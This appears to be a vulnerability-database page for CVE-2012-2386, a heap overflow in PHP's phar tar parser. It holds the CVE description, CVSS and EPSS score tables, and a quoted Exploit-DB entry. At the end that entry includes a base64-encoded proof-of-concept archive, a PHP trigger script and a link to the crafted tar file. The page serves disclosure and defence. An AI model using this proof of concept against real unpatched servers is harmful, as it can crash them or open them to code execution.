CVE-2012-2386

EPSS

14.71%V4

Vector

Network

Published

2012-07-07
08h00 +00:00

Modified

2012-07-23
07h00 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

Integer overflow in the phar_parse_tarfile function in tar.c in the phar extension in PHP before 5.3.14 and 5.4.x before 5.4.4 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted tar file that triggers a heap-based buffer overflow.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-189	Category : Numeric Errors Weaknesses in this category are related to improper calculation or conversion of numbers.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	7.5		AV:N/AC:L/Au:N/C:P/I:P/A:P	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	36.8%	–	–
2022-04-03	–	–	36.8%	–	–
2022-06-26	–	–	35.49%	–	–
2022-09-25	–	–	34.7%	–	–
2022-12-25	–	–	35.21%	–	–
2023-02-05	–	–	12.57%	–	–
2023-02-19	–	–	35.21%	–	–
2023-03-12	–	–	–	8.51%	–
2023-06-04	–	–	–	8.51%	–
2024-06-02	–	–	–	8.51%	–
2024-06-02	–	–	–	8.51%	–
2024-07-07	–	–	–	8.51%	–
2024-07-21	–	–	–	8.51%	–
2024-07-28	–	–	–	9.46%	–
2024-11-17	–	–	–	11.88%	–
2024-12-22	–	–	–	7.89%	–
2025-01-05	–	–	–	15.3%	–
2025-03-02	–	–	–	18.62%	–
2025-01-19	–	–	–	15.3%	–
2025-03-09	–	–	–	18.62%	–
2025-03-18	–	–	–	–	13.29%
2025-03-30	–	–	–	–	14.71%
2025-03-30	–	–	–	–	14.71,%

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Date	Percentile
2022-02-06	97%
2022-04-03	98%
2022-06-26	98%
2022-09-25	98%
2022-12-25	98%
2023-02-05	95%
2023-02-19	98%
2023-03-12	93%
2023-06-04	94%
2024-06-02	94%
2024-06-02	94%
2024-07-07	95%
2024-07-21	95%
2024-07-28	95%
2024-11-17	96%
2024-12-22	94%
2025-01-05	96%
2025-03-02	96%
2025-01-19	96%
2025-03-09	96%
2025-03-18	94%
2025-03-30	94%
2025-03-30	94%

Exploit information

Exploit Database EDB-ID : 17201

Publication date : 2011-04-21 22h00 +00:00
Author : Alexander Gavrun
EDB Verified : No

from: http://0x1byte.blogspot.com/2011/04/php-phar-extension-heap-overflow.html version PHP: 5.3.6 version phar ext.: 1.1.1 site: http://php.net/ source code: http://windows.php.net/downloads/releases/php-5.3.6-src.zip An integer overflow vulnerability leading to a heap overflow in the file ..\php-5.3.6\ext\phar\tar.c. int phar_parse_tarfile(php_stream* fp, char *fname, int fname_len, char *alias, int alias_len, phar_archive_data** pphar, int is_data, php_uint32 compression, char **error TSRMLS_DC) /* {{{ */ { //..... size = entry.uncompressed_filesize = entry.compressed_filesize = phar_tar_number(hdr->size, sizeof(hdr->size)); //(*) //..... if (!last_was_longlink && hdr->typeflag == 'L') { last_was_longlink = 1; /* support the ././@LongLink system for storing long filenames */ entry.filename_len = entry.uncompressed_filesize; entry.filename = pemalloc(entry.filename_len+1, myphar->is_persistent); //(**) read = php_stream_read(fp, entry.filename, entry.filename_len); //(***) //..... If entry.filename_len(which attacker can control) equal 0xffffffff, pemalloc() will allocate zero length buffer. Then php_stream_read() get as a length parameter 0xffffffff value. Because php_stream_read () checks that the passed length does not exceed the amount of data available, the buffer overflow sizes are available from the data stream. POC code (MIME encoded): php_phar.zip begin UEsDBBQAAAAIAA96ez4k50+6aQAAAG0AAAAIAAAAcGhhci5waHAVi0sKgzAQ QPeeYhoKTjbpAfpx1ULBhTcYghlxUJMhCnp8ze7xeO/V6KggA+CNj43jKinS nHzggEZHn421EITRrJOosc+quhcNb4i8Q3chBsnRL4xEv3/7JbLgoH5o6l0p 3eZzXb7mcwJQSwMEFAAAAAgAMbB7PrO7HsFRAAAAmxAAAAwAAABwb2MucGhh ci50YXLtzTsKgDAQRdFZiisQM9HJJtxEQEEbCX7A5RsrC2u18J7y8eCOU9fv ZRqSPKfKzOy2h4s4V2ndmFevct590KKVF2zLGueclH+KAAAAAAB86wBQSwEC FAAUAAAACAAPens+JOdPumkAAABtAAAACAAAAAAAAAAAACAAAAAAAAAAcGhh ci5waHBQSwECFAAUAAAACAAxsHs+s7sewVEAAACbEAAADAAAAAAAAAAAACAA AACPAAAAcG9jLnBoYXIudGFyUEsFBgAAAAACAAIAcAAAAAoBAAAAAA== end PHP POC: <?php if (!extension_loaded("phar")) die("skip"); $phar = new Phar(dirname(__FILE__) . '/poc.phar.tar'); ?> https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17201.phar.tar (poc.phar.tar)